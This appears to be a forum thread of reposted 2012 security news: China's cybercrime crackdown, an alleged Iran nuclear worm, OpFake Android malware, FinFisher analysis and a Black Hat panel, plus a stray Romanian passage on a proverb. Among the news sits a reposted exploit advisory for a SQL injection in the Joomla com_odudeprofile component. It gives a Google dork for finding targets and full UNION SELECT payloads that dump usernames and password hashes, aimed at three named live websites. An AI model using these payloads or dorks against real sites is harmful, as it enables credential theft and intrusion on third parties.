China's Web policing nets 600 criminal gangs | ZDNet Summary: Country's efforts to clamp down on Web-related criminal activities has resulted in more than 10,000 suspects arrested and 30 ISPs censured for allowing access to unlicensed Web sites so far . By Ellyne Phneah | July 26, 2012 -- 04:45 GMT (21:45 PDT) Chinese authorities has busted more than 600 criminal gangs for Internet-related crimes since a campaign was launched in March. According to a statement released Wednesday by the country's Ministry of Public Security, the campaign had "achieved remarkable results" with more than 10,000 suspects arrested and 3.2 million "harmful" online messages deleted. Some 62 Web sites and online forums have been told to remove inappropriate content, while 30 Internet service providers (ISPs) were punished for granting network access to unlicensed Web sites, it added. Major crimes uncovered during the crackdown include the spreading of pornography, guns trading, counterfeiting of certificates, and illegally collecting and selling of citizens' information, the statement noted. The ongoing campaign also saw the Chinese police in Jieyang take down a group of hackers allegedly responsible for breaching 185 government sites on Thursday. They were said to be part of a network of certificate forgers and personal data collectors selling fake certificates. Combating cybercrime is a "long and arduous task", the ministry stated, but it will continue to increase efforts to "maintain public order, protect the legitimate rights and interest of the masses, and promote healthy and orderly development of the Internet". Sursa: China's Web policing nets 600 criminal gangs | ZDNet

China cracks hacking syndicate | ZDNet Summary: Local police takes down group of hackers allegedly responsible for breaching 185 government Web sites, and who are part of network of certificate forgers and personal data collectors selling fake certificates. By Jamie Yap | July 26, 2012 -- 02:48 GMT (19:48 PDT) Chinese police have detained a gang of hackers, certificate forgers, and personal data collectors, believed to be responsible for attacks on 185 government Web sites to manufacture and sell fake certificates ranging from medical care to financial services. China Daily reported on Thursday the suspects allegedly hacked into sites managed by authorities in 30 provinces, municipalities and autonomous regions. Chen Xiaoping, head of Jieyang police's cybercrime unit, said the group tampered with official databases such that if anyone looked up a particular person's certificate details, it would reflect the hacker group's client instead of the original owner. This caused "great damage to the image of the government", added Xie Yaoqi, director of the public security bureau in Jieyang, in the report. China Daily reported the crackdown began when the city's office of personnel and examinations reported an attack on its site on Dec. 8, 2011, after finding a link had been illegally added. This led police to seven suspects who sold fake certificates in Nanjing, Jiangsu province and Heyuan in Guangdong, and subsequently the discovery of a network of hackers, certificate forgers, advertisers, and personal data collectors scattered across at least 12 provinces in China. As of Jul. 12, police have arrested 165 people, confiscated more than 7,100 fake certificates and at least 10,000 fake seals, and are still searching for more syndicate members, the report added. Chen said 14 principal suspects from the gang were under the age of 30, with the youngest aged 18. "They have a strong idea on how not to get caught," he said. "They used overseas servers and bank accounts of strangers, whose details were bought online." He noted that hackers attacked government sites to show off their skills in the past, but now do so to make money. The fake certificates were sold between 4,000 yuan (US$632) and 10,000 yuan (US$1,580), and generated profits of more than 300 million yuan (US$47,409), the article stated. The large-scale hacking of government sites has exposed a huge market for fake certificates in China, it added. Jieyang police claimed more than 30,000 people bought fake qualifications made by the gang, including medical care, financial services, and architecture. Xu Jianzhuo, from the Ministry of Public Security's network security bureau, called for stricter supervision in addition to police intervention to tackle cybercrime, including laws and regulations to strengthen the obligations of Internet service providers (ISPs) to verify users' information. Collecting evidence for cybercrimes is difficult and the real-name registration rule has not been genuinely put into practice, so users can still register with a fake name and ID number which would not be verified by the online service provider, he added. Sursa: China cracks hacking syndicate | ZDNet

Iran nuclear facilities struck down by midnight 'thunder' | ZDNet Summary: Iran's nuclear program has been subject to another attack, with several workstations in two facilities blasting AC/DC's "Thunderstuck" in the middle of the night. By AAP and Michael Lee | July 26, 2012 -- 02:22 GMT (19:22 PDT) ran's nuclear program has been hit by a cyber virus that has shut down key computerised functions at two facilities and played music by the rock band AC/DC at loud volumes, according to a report on internet security website F-Secure. The website earlier this week said that it was informed of the cyber attack by a scientist working at the Atomic Energy Organisation of Iran (AEOI), who sent F-Secure an email detailing the breach. F-Secure had confirmed the email came from within AEOI. The email said: "Our nuclear program has once again been compromised and attacked by a new worm ... The automation network and Siemens hardware were attacked and shut down. I only know very little about these cyber issues as I am [a] scientist, not a computer expert. "There was also some music playing randomly on several of the workstations during the middle of the night, with the volume maxed out. I believe it was playing 'Thunderstruck' by AC/DC." The two facilities in question are the Natanz facility, which was the target of the Stuxnet attack, and a facility located near Qom, Iran. Iran's cyber security experts working on the issue wrote to scientists, stating that they believe the attacker had access to the facilities' VPN and had used the popular open-source exploitation framework Metasploit to gain access to its systems. Metasploit itself enables computers to be scanned, mostly autonomously, for known vulnerabilities, making it an easy way for attackers to infiltrate systems without necessarily understanding how the exploit works. Iran's nuclear program has been a frequent target of cyber attacks, which the country's leaders have blamed on Israel and the United States. Sursa: Iran nuclear facilities struck down by midnight 'thunder' | ZDNet

This Xbox HDMI cable has 'anti-virus protection' | ZDNet Summary: No, I'm not late for April Fools' Day. This is simply just false advertising at its best (or worst, depending on your point of view). By Emil Protalinski for Zero Day | July 25, 2012 -- 23:00 GMT (16:00 PDT) Sometimes, you just can't make this stuff up. I mean, if you tried really, really hard, you wouldn't come up with anything like it. This "superior quality HDMI LX Cable" not only offers you "an exceptional image, whether you are playing a game or watching your favourite DVD" but it also has "anti-virus protection." Seriously, that's what the feature list on the packaging claims. As you can see in the image above, courtesy of Gizmodo, the cable features "'100% Mylar' double shield 1.3c grade cable with anti-virus protection to reduce virus noises and to obtain perfect image transmission." Here's the kicker, in case you were too astounded that you missed it. The cable doesn't claim to feature virus protection. No. It features anti-virus protection. Virus protection protects you from viruses. So anti-virus protection must protect you from anti-viruses? I'm having some trouble stopping my head from shaking. Gizmodo asks if there are any people in this world "so stupidly stupid as to believe that a virus may attack your video cables and cause noise." Readers in the comments section have responded with a resounding yes, unfortunately. This company should be sued into oblivion. Actually, Microsoft should sue this company into oblivion. After all, it's apparently called the "Xbox 360 Elite HDMI cable." I'm pretty sure Redmond wouldn't be too please to know its brand is being used in this way. In fact, I've made a point to contact the software giant about this little tidbit. I'll update you if and when I hear back. Sursa: This Xbox HDMI cable has 'anti-virus protection' | ZDNet

La romani e un proverb, "Ai carte, ai parte.". Asa e si in viata, ai carte, ai parte de un loc de munca bine platit, un loc de munca unde poti face ce`ti place. In schimb, cand nu ai carte, treaba devine putin mai, "naspa", atunci cand nu poti lega doua vorbe, ajungi fie vreun salahor pe santier, fie la cules de dude prin Spania. Apropo, stiai ca la inceput "cartea" din acest proverb se referea la cartea funciara? Cu mult inaintea noastra, cartea funciara simboliza detinerea unei proprietati. La ceva timp dupa asta, in urma asocierii cu invatatura, aceasta a primit un nou sens, acela al beneficiului educatiei.

Warning: New Android malware tricks users with real Opera Mini | ZDNet Summary: Cybercriminals have created a new variant of the OpFake malware for Android that comes bundled with a legitimate version of the Opera Mini mobile browser. This helps trick users into thinking that nothing is wrong as they can simply use the real software as expected. By Emil Protalinski for Zero Day | July 25, 2012 -- 18:25 GMT (11:25 PDT) A new piece of malware is trying to take advantage of Opera's popularity as a mobile browser alternative on Android smartphones. Cybercriminals have created a new variant of Opfake that bundles the real Opera Mini version 6.5 so as to further mask what the malware is actually doing (earning its creators money from unsuspecting users by sending international text messages). GFI, which first discovered the malware, is calling this particular threat Trojan.AndroidOS.Generic.A. The package is named "com.surprise.me" while the file name is "opera_mini_65.apk" (both can easily be changed). As you can see above, two sets of "Permission to Install" pages are displayed during installation. The first (above in the middle), comes from the malware itself: it asks for read and modify rights to all SMS and MMS messages, read rights to all contacts stored on the smartphone, modify or delete rights to the SD card, and so on. The second (above on the right) one appears once users agree to install the first, which is simply the permissions required for the legitimate Opera Mini browser. This particular threat is interesting because it shows that OpFake is evolving. Instead of trying to mimic a popular app, OpFake now simply installs the real version. As a result, the user is less suspicious that something is wrong. "More than likely, users will not be aware that something might have infiltrated their phones until the bill arrives," a GFI spokesperson said in a statement. The devil is in the details: in the background, the malicious app sends expensive international text messages to earn its creators revenue. The malicious app does the dirty work to incur costs on the victim. More specifically, here's what this particular threat does: It sends one SMS message to a premium-rate number before it installs the legitimate Opera Mini. A command and control (C&C) server controls the message sent and the number where it is sent. It also connects to the C&C server to retrieve data. It reads the following stored information: Country location, Operator name, OS version, Phone type, and Device ID (IMEI). Android lets you download and install apps from anywhere. If you want the official version of an app, however, get it from the official Google Play store. Here is the official Opera Mini link: play.google.com/store/apps/details?id=com.opera.mini.android. Sursa: Warning: New Android malware tricks users with real Opera Mini | ZDNet

iOS app developer: Android is designed for piracy | ZDNet Summary: An iOS app developer argues Apple's App Store is superior than the Google Play store, and he's not the first to say so. Fragmentation aside, he argues that "closed" is better than "open" because piracy isn't a serious problem, and at the end of the day, most app developers need to make money. By Emil Protalinski for Zero Day | July 25, 2012 -- 16:37 GMT (09:37 PDT) Following Madfinger Games' decision to relaunch one its Android games as a free app due to an "unbelievably high" piracy rate, iOS and Mac app developer Matt Gemmell has weighed in on the situation. He has written a lengthy post titled Closed for Business in which he explains why Android app creators are having so much trouble making money. The article's subheadings pretty much summarize the piece: Designed for piracy, A broken business model, and Freedom from choice. Here are three quotes from each section that I found particularly worthy to highlight: "The system is designed for piracy from the ground up. The existence of piracy isn't a surprise, but rather an inevitability." "Piracy isn't a symptom of social disease. Piracy is a symptom of failure to find an effective business model." "Open is broken as a money-making platform model, unless you're making the OS or the handsets. Most of us aren't doing that." Gemmel makes excellent points throughout his piece and I strongly recommend reading the whole thing. Many will be quick to point out that he's an iOS app developer, so his conclusion under the last heading "Lock it down" should not be surprising: "Closed is better for business." The problem is that he's right. There's absolutely no denying that (most) app developers make more money on iOS and that the App Store is much more profitable for Apple than the Google Play store is for Google. That being said, however, I don't believe that "closed" is the solution. Gemmel clearly outlines why one is better than the other for app developers, and I do think Google needs to bring some of the App Store's features to the Google Play store, but I also believe Apple should do the same in vice versa. There is a middle-ground between open and closed, between unlocked and locked, between free and paid. I just don't think we've found it yet, and likely won't for quite a while longer. After all, app stores are still relatively new as a concept as well as a business model. Sursa: iOS app developer: Android is designed for piracy | ZDNet

Researchers claim FinFisher scalp with RAT analysis | ZDNet Summary: Researchers believe they have analysed FinSpy, part of the FinFisher cyber-espionage suite, which was sent to Bahraini activists this year By Tom Espiner | July 25, 2012 -- 16:34 GMT (09:34 PDT) Researchers believe they have analysed part of Finfisher, a commercially-available cyber-espionage suite, for the first time. Having analysed several pieces of malware sent to Bahrani pro-democracy activists and obtained by Bloomberg News, researchers from the University of Toronto Munk School of Global Affairs' Citizen Lab believe they have identified one part of the suite made by Gamma International. FinSpy, Finfisher's Remote Access Tool (RAT), is designed to intercept encrypted communications, according to documents on WikiLeaks. The RAT has the capability of allowing an attacker to monitor encrypted communications such as Skype calls, according to Citizen Lab. The RAT attempted to infect the Bahraini activists' machines using social engineering, said the researchers. "In early May, we were alerted that Bahraini activists were targeted with apparently malicious e-mails," Munk researcher said in a blog post on Wednesday. "The emails ostensibly pertained to the ongoing turmoil in Bahrain, and encouraged recipients to open a series of suspicious attachments." The emails sent to activists typically featured infected .rar compression files, which contained executables masquerading as picture files or documents. Once executed, the files installed a multi-featured Trojan which used "a myriad of techniques" to try to evade detection. For example, a virtualised, bespoke packer converted native x86 instructions from the malware into another custom language chosen from one of 11 code templates. These instructions were then interpreted by an obfuscated interpreter customised for that particular language. The malware also looks for antivirus software, and appears to be able to evade some antivirus on a version-by-version basis, said the researchers. The RAT collects a wide range of data from an infected victim, including screenshots, keylogger data, audio from Skype calls, and passwords, said Citizen Lab. Data such as Skype chat messages and audio from all participants from a call are extracted, encrypted using AES, and sent to the party that launched it. Samples of the Trojan have been extremely hard to come by, according to F-Secure chief research officer Mikko Hypponnen. "To analyse this sample in detail is groundbreaking," Hypponnen told ZDNet on Wednesday. "We've seen sales pitches, but we haven't seen a sample before." Hypponen said that F-Secure would now ask for a sample of the Trojan, and build it into its anti-malware. Sursa: Researchers claim FinFisher scalp with RAT analysis | ZDNet

Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode Exploit Title: Joomla com_odudeprofile V2.x Exploit Google Dork: inurl:index.php?option=com_odudeprofile Date: [24-07-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R site: Poison Security Vendor: ODude Network Version: 2.7 & 2.8 Download: ODude Profile 2.8 License: Non-Commercial Tested on: [Linux(arch)-Windows(7ultimate)] ______________________________________________________________________________________ Exploit Title: Joomla com_odudeprofile V2.x Exploit Google Dork: inurl:index.php?option=com_odudeprofile Date: [24-07-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R site: http://poisonsecurity.wordpress.com/ Vendor: http://www.odude.com Version: 2.7 & 2.8 Download: http://www.odude.com/home/profile.html License: Non-Commercial Tested on: [Linux(arch)-Windows(7ultimate)] ______________________________________________________________________________________ Test: http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27 Sql: http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) demo1: http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D,password%29%20from%20jos_users%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20demo2: Demo2 http://www.eveproducciones.com.mx/perfil/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28jos_users.username,0x3D,jos_users.password%29%20from%20%60eveprodu_joomesp%60.jos_users%20Order%20by%20username%20limit%200,1%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20d4nb4r demo3: http://www.urbansky.co.za/index.php?option=com_odudeprofile&view=search&profession=999999.9.9%27%20union%20all%20select%200x31303235343830303536%2Cconcat%28unhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R Gift: http://www.eveproducciones.com.mx/perfil/ Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ Daniel Barragan "D4NB4R" # 1337day.com [2012-07-25] Sursa: Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

Apple removes Windows malware from iOS App Store | ZDNet Summary: Malware hit the iOS App Store. Don't worry though: it won't harm your iPhone, iPad, or Mac (your Windows computer is a different story, but even that is a long shot), and Apple has already removed it. On Tuesday, an iOS app in the App Store was discovered containing malicious Windows executable files. While this meant your iPad, iPhone, iPod touch, and Mac could not be infected, even Windows users were relatively safe since the malware had to be manually extracted from the iOS application package. Either way, Apple quickly removed it. iOS user "deesto" posted the following message in the Apple Support Communities forum in a post titled "apps reported as virus" (via CNET): In short, the app called "Instaquotes-Quotes Cards For Instagram" was being flagged by the user's antivirus as a worm. While some argued this was a false positive, it was quickly confirmed the iOS package included a threat identified as Worm.VB-900 by ClamAV and Worm:Win32/VB.CB by Microsoft. The app in question had been in the App Store since July 19. Over the weekend, its price was temporarily slashed from $0.99 to free. It is unknown how many users downloaded the infected app while it was available, and Apple is unlikely to share such information. Within hours of the report, Apple removed the app from the App Store. The developer "Appsstand" then posted the following message in the same forum topic: It's not entirely clear whether the malware's inclusion inside the app was done on purpose. Given that it wasn't exactly set up to infect a computer upon download, it's most likely this was an accidental inclusion due to an the developer's computer being infected. Apple needs to start scanning for Windows malware as well as Mac and iOS malware when developers upload their apps to the company's app repository. A simple extraction and scanning of all the files from the iOS app package would have prevented this threat from getting onto the iOS App Store. Sursa: Apple removes Windows malware from iOS App Store | ZDNet

Black Hat – Smashing the future for fun and profit | Naked Security by Chester Wisniewski on July 25, 2012 I'm delighted to once again be writing to you from the Black Hat USA conference in Las Vegas, Nevada. This year's Black Hat is as big as ever and the talks seem to have improved over 2011. The first session I sat in today was titled "Smashing the future for fun and profit" and was a panel with Jeff Moss (Dark Tangent), Adam Shostack, Marcus Ranum and Bruce Schneier moderated by Jennifer Granick. Those of you that may have asked me to be on a panel in the past may well know that I am not a big fan of panels. Most of them are buckets of #FAIL. This one however was very well executed. It was a great mix of hands-on practitioner mixed with big think topics. Surprisingly nearly the entire discussion revolved around the role, responsibilities and behavior of government. Maybe Jeff is to blame for that considering his roles at Homeland Security and ICANN. I think generally everyone seemed to agree with Marcus Ranum on the dividing line between what the government should be doing versus the private sector. Just like in other parts of our society the line is drawn between what only a nation-state can do and what the private sector is incented to do. Jeff pointed out that government also plays an important role in those things that the private sector simply isn't interested in, even if the development of these new technologies is needed and important. He gave examples of how DHS has been involved in further development work on DNSSEC and secure BGP. Both are very important for the future integrity and security of the internet, yet there was little commercial advantage for the private sector to invest. Jennifer did a brief poll asking the audience if they were more afraid of the government having access to their information and doing undesirable things with it or if we were more afraid of Google. A significantly larger proportion are afraid of Google. Phrased another way we were asked if we are most afraid of the government, corporations or "the bad guys". When put in these terms the "bad guys" were the most feared without question. I found the panels opinions both enlightening and realistic. It was a no-bullshit zone and that openness lead to the success of the session. The conclusion sums it up well. We still have a long way to go and we will not ever likely get there, but ten years from now we are likely to be better off for having tried to make it better. Sursa: Black Hat – Smashing the future for fun and profit | Naked Security